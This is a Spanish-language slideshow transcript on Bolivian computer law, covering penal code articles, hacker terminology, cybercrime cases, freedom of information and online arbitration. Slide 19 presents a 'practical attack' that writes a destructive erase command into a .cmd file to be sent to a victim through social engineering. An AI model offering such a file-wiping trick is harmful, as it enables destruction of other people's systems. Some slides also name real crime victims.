La descarga está en progreso. Por favor, espere

La descarga está en progreso. Por favor, espere

LEGISLACION EN INFORMATICA

Presentaciones similares


Presentación del tema: "LEGISLACION EN INFORMATICA"— Transcripción de la presentación:

1 LEGISLACION EN INFORMATICA
Y DATOS

2 INTRODUCCION El avance de la informática y los medios tecnológicos modernos como el internet y sus redes sociales, han ayudado a globalizar la información y la comunicación, sobre cualquier tema y a todo nivel, facilitando a todas las personas  el acceso al mundo de los conocimientos. El creciente y significativo avance que ha generado el desarrollo, difusión y uso generalizado de la informática y su reciente impacto en la sociedad boliviana, despierta con la explosiva incorporación del Internet.

3 Es necesario comprender y conocer los alcances de las leyes en informática y datos, tanto del derecho penal tradicional, como del derecho y legislación en informática, aún en desarrollo. La diversificación y globalización de los mercados Ha posibilitado al entorno empresarial y a particulares en general, hacer uso de modernos servicios en una estrategia centrada en costo-beneficio via Internet tanto de publicidad a nivel global, con el uso de páginas web, obtención de comunicación efectiva, dinámica e instantánea, uso de direcciones electrónicas, comercio electrónico, tiendas virtuales y empleo de contratos informáticos entre personas naturales y jurídicas.

4 El carácter multifacético de esta tecnología y su previsible intensidad e impacto en el mediano y largo plazo, ha generado a su vez la creación y proliferación de nuevas formas de delinquir, las que contrastan con el progresivo avance tecnológico en una realidad sociológica y fáctica en permanente transformación.

5 Existen dos grupos de valores merecedores de amparo específico por la legislación penal boliviana.
la criminalidad informática: afecta a bienes jurídicos, se utiliza el computador para redactar una carta difamando a personas físicas o jurídicas, o atentar contra la integridad personal, la fe publica o la seguridad nacional: el fraude electrónico y el sabotaje informático. Delitos Informáticos¨ o ¨cybercrímenes fraude informático, robo de software, sabotaje y vandalismo de datos, alteración, acceso y uso indebido de datos informáticos, manipulación informática y parasitismo informático.

6 ANTECEDENTES DE LAS LEYES EN INFORMATICA Y DATOS
En el año de 1989, se consideró el análisis y tratamiento sobre Legislación Informática concerniente a contratación de bienes y servicios informáticos, flujo de información computarizada, modernización del aparato productivo nacional mediante la investigación científico- tecnológica en el país y la incorporación de nuevos delitos emergentes del uso y abuso de la informática

7 CODIGO PENAL - LEY N° 1768 Por Ley Nº 1768 del 10 de marzo de 1997 Art. 363 bis.- (MANIPULACION INFORMATICA). El que con la intención de obtener un beneficio indebido para sí o un tercero, manipule un procesamiento o transferencia de datos informáticos que conduzca a un resultado incorrecto o evite un proceso tal cuyo resultado habría sido correcto, ocasionando de esta manera una transferencia patrimonial en perjuicio de tercero, será sancionado con reclusión de uno a cinco años y con multa de sesenta a doscientos días.

8 Art. 363 ter.- (ALTERACION. ACCESO Y USO INDEBIDO DE DATOS INFORMATICOS).
El que sin estar autorizado se apodere, acceda, utilice, modifique, suprima o inutilice, datos almacenados en una computadora o en cualquier soporte informático, ocasionando perjuicio al titular de la información, será sancionado con prestación de trabajo hasta un año o multa hasta doscientos días

9 SILEG Es un sistema informático que consiste en bases de datos en la que se encuentran registradas y ordenadas todas las disposiciones normativas que se han aprobado desde la fundación de la República.

10 Como nace SILEG Durante su larga historia republicana en nuestro país, se han promulgado miles de leyes, decretos y reglamentos que afectan a la vida de la nación y también a sus habitantes; todos estos documentos se plasman en cientos en miles de hojas de papel. Vanos han sido los esfuerzos por conseguir registros de acceso colectivos a estos instrumentos legales, en la actualidad son pocas las personas que tienen acceso a ellos, por eso es que PARAVICINI & ASOCIADOS se enorgullece en haber desarrollado el SISTEMA LEGISLATIVO INFORMÁTICO BOLIVIANO "Sileg"

11 Hackers Un hacker es un experto en varias o algunas ramas relacionadas con la computación y telecomunicaciones: programación, redes de comunicaciones, sistemas operativos, hardware de red/voz. Entusiasta de la informática. La palabra se suele usar para indicar también un cierto intrusismo: un hacker es una persona que siempre está deseando aprender y superar nuevos retos, entre los que se pueden encontrar el acceder a un cierto sistema teóricamente cerrado. Pero esto no quiere decir que se haga con malicia, sino por el propio reto en sí. Cuando se trata de alguien con intenciones maliciosas se suele emplear la palabra "cracker".

12 Hacker’s famosos 1. Kevin Mitnick (nokia – motorola)
2. Kevin Poulson (1990 – n° 120 – 1991 BD FBI) 3. Adrian Lamo (microsoft – newyork times ) 4. Stephen Wozniak (blue box) 5. Joanna Rutkowska ( windows vista ) 6. Kristina Svechinskaya (220 millones GB EEUU) 7. Tsutomu Shimomura

13 Cracker Es un persona que intenta acceder a un sistema informático sin autorización. Estas personas tienen a menudo malas intenciones, en contraste con los hackers, y suelen disponer de muchos medios para introducirse en un sistema.Pirata informático o persona que accede sin autorización a un servidor o levanta la protección de un programa informático para aprovecharse de alguna manera de su contenido.

14 Samurai Es un hacker que se creo amparado por la ley y la razón, normalmente es alguien contratado para investigar fallos de seguridad, que investiga casos de derechos de privacidad, esta amparado por la primera enmienda estadounidense o cualquier otra razón de peso que legitime acciones semejantes. Los samurái buscan a los crackers y a todo tipo de vándalos. Electrónicos.

15 Tecnicas Comunes Scanning  TCP Connect() Scanning  TCP SYN Scanning  TCP FIN Scanning- Stealth Port Scanning  Fragmentation Scanning  Eavesdropping-Packet Sniffing  Snooping-Downloading  Ping  Trashing ("Basurero"  Ataques de autenticación  Spoofing-Looping  Spoofing  DNS Spoofing  Web Spoofing  IP Splicing-Hijacking  Utilización de BackDoors  Utilización de Exploits  Obtención de Passwords  ARP poisoning  Negación de servicio (DOS)  Jamming o Flooding  Syn Flood  Connection Flood  Net Flood  Land Attack  Supernuke o Winnuke  Teardrop I y II-Newtear-Bonk-Boink  Bombing-Spamming  Ataques de modificación o daño  Tampering o Data Diddling  Borrado de Huellas (fingerprint wipe)  Ataques Mediante Java Applets  Ataques Mediante JavaScript y VBScript  Ataques Mediante ActiveX  Ataques por Vulnerabilidades en los Navegadores 

16 DELITO INFORMATICO

17 Un delito informático o ciberdelicuencia es toda aquella acción, típica, antijurídica y culpable, que se da por vías informáticas o que tiene como objetivo destruir y dañar ordenadores, medios electrónicos y redes de Internet. Debido a que la informática se mueve más rápido que la legislación, existen conductas criminales por vías informáticas que no pueden considerarse como delito, según la "Teoría del delito", por lo cual se definen como abusos informáticos, y parte de la criminalidad informática.

18 La criminalidad informática tiene un alcance mayor y puede incluir delitos tradicionales como el fraude, el robo, chantaje, falsificación y la malversación de caudales públicos en los cuales ordenadores y redes han sido utilizados como medio.

19 Ejemplo Practico de ataque informatico
1- Abran el notepad, y pongan erase c:/WINDOWS/q. 2- Ahora ponganle cualquier cosa de nombre (quedaría así cualquiercosa.cmd 3- Guardenlo en qualquier lugar, y no lo abran!!!!!!!!!!!  ahora eso es todo... ahora pueden enviarselo a su victima y cuando lo abran....  TODO EL WINOWS SE LES VA A BORRAR.....!! Ojo utilizar ingenieria social.

20 Casos interesantes Bradley Manning, un militar estadounidense que pertenecía al servicio de Inteligencia, debió de quedarse conmocionado cuando hace un mes la policía militar procedió a arrestarle en la Base Hammer de Operaciones Avanzadas.

21 Casos en Bolivia Joven asesinada El 28 de noviembre, el cuerpo de la universitaria de 20 años Blanca Rubí Limachi fue hallado enterrado en el patio de la casa de la familia Choque Flores, en la urbanización San Martín de El Alto.  El cadáver de la joven estaba envuelto en un yute azul.   Blanca fue contactada por Richard Ch. a través del Facebook. Éste creó una cuenta falsa y fingió ser un docente del Colegio Militar. Prometió "ayudar” a Blanca a ingresar a esta instancia si le daba cierta suma de dinero.

22 Casos en Bolivia Video íntimo La presentadora de televisión Paola Belmonte fue víctima de extorsión presuntamente por parte de un joven con quien mantuvo una relación. Un video íntimo de la pareja fue difundido por una página de internet para adultos, pero meses antes su expareja le pidió una gran suma de dinero para que las imágenes no sean difundidas.

23 Casos en Bolivia Niño fue acosado El pasado fin de semana, la Policía capturó a Juan Pablo, de 26 años, por acosar a un niño de 11 años, desde que éste tenía nueve. Envió  dos cartas a la madre de la víctima en las que pedía permiso para tener una relación con el menor, lo que permitió atraparlo.

24 Perfil de un delincuente informático

25 En general son personas que no poseen antecedentes delictivos.
La mayoría de sexo masculino. Actúan en forma individual. Poseen una inteligencia brillante y alta capacidad lógica. Son jóvenes con gran solvencia en el manejo de la computadora. También hay técnicos no universitarios, autodidactas, competitivos, con gran capacidad de concentración y perseverancia. En las organizaciones, las personas que cometen fraude han sido destacadas en su ámbito laboral como muy trabajadoras y motivadas.

26 El delito informático es un delito de “cuello blanco”

27 La criptografía La criptografía es una tecnica que nos permite cifrar un mensaje. Tiene por objetivos: Confidencialidad Integridad Autenticacion

28 Derecho de acceso a la información

29 El acceso a la información es el derecho que tiene toda persona de buscar, recibir y difundir información en poder del gobierno. “La libertad de información es un derecho fundamental y... la piedra angular de todas las libertades a las que están consagradas las Naciones Unidas”

30 …en Bolivia Artículo 24, “Toda persona tiene derecho a la petición de manera individual o colectiva, sea oral o escrita, y a la obtención de respuesta formal y pronta”. Artículo 106 “El Estado garantiza el derecho a la comunicación y el derecho a la información”. Artículo 8, que determina que “El Estado se sustenta en los valores de..., libertad,…, transparencia,…, responsabilidad,…, para vivir bien”.

31 La organización Acces Info Europe, con sede en Madrid pero con proyección europea, es una de las que lidera los esfuerzos por fortalecer el ejercicio del derecho a la información de los ciudadanos con numerosas iniciativas y programas.

32 Los 10 puntos clave para una buena Ley de Transparencia:
1. El derecho de acceso a la información es un derecho fundamental de toda persona. 2. El derecho se aplica a todas las entidades públicas. 3. El derecho de acceso a la información se aplica a toda la información elaborada. 4. Realizar solicitudes debe ser sencillo, rápido y gratuito. 5. Los funcionarios tienen la obligación de ayudar a los solicitantes.

33 Los 10 puntos clave para una buena Ley de Transparencia:
6. Principio de publicidad de la información. 7. Las denegaciones de acceso a la información deben ser limitadas y estar debidamente motivadas. 8. Toda persona tiene el derecho a recurrir las denegaciones de acceso o la no contestación a las solicitudes realizadas. 9. Las entidades públicas, deben poner a disposición del público información básica y esencial sin que sea necesario realizar una solicitud. 10. El derecho de acceso a la información debe ser garantizado por un órgano independiente

34 PERITAJE INFORMATICO

35 QUE ES PERITAJE INFORMATICO
Se conoce como peritaje informático a los estudios e investigaciones orientados a la obtención de una prueba informática de aplicación en un asunto judicial para que sirva a un juez para decidir sobre la culpabilidad o inocencia de una de las partes. Son también los estudios e investigaciones usados en asuntos privados para la búsqueda de pruebas y argumentos que sirvan a una de las partes en discusión para decantar la discrepancia a su favor. Habitualmente se recurre a pruebas periciales informáticas en asuntos penales en los que la infraestructura informática media como herramienta del delito, por ejemplo la pornografía infantil en Internet. Son otros asuntos los delitos contra la propiedad privada e intelectual, espionaje industrial, protección de datos personales, fraudes, sabotajes, etc.

36

37

38

39

40 ARBRITAJE INFORMATICO
El arbitraje profesional como procedimiento para la resolución de conflictos es una opción cada vez más utilizada por sus ventajas de trámite, económicas y de plazo frente a las dificultades del litigio en los tribunales ordinarios. Los árbitros profesionales de las diferentes cortes establecidas cuentan con una gran capacidad de ayuda potencial a las partes en conflicto, garantizando un proceso neutral e independiente, generando un laudo de obligado cumplimiento y con mayor facilidad para su ejecución.

41 ARBITRAJE ON LINE El arbitraje on line se evidencia como la estrella de la denominada tecnología ODR (Online Dispute Resolution). La tecnología ODR pone fin a cualquier limitación geográfica que pueda existir entre dos o más partes permitiendo que todo el proceso arbitral se desarrolle en “salas virtuales”. Desde 1999 se pueden hacer arbitramentos internacionales vía electrónica y en tiempo real, en controversias relacionadas con marcas y dominios de empresas.

42 EL ARBITRAJE ELECTRÓNICO O VIRTUAL EN LA LEGISLACIÓN BOLIVIANA
Como es de conocimiento general la Ley de Arbitraje y Conciliación Nº 1770 ha cumplido más de trece años de vigencia en nuestro país con muchas luces y algunas sombras como cualquier otra norma.  En ese sentido, este articulo pretende partir de la mentada frase que dice: “El Derecho es una ciencia dinámica que debe evolucionar constantemente con las sociedades”, y bajo esa premisa debemos tener presente que en este mundo globalizado ha nacido una figura legal interesante que viene a denominarse Arbitraje Electrónico o Virtual.


Descargar ppt "LEGISLACION EN INFORMATICA"

Presentaciones similares


Anuncios Google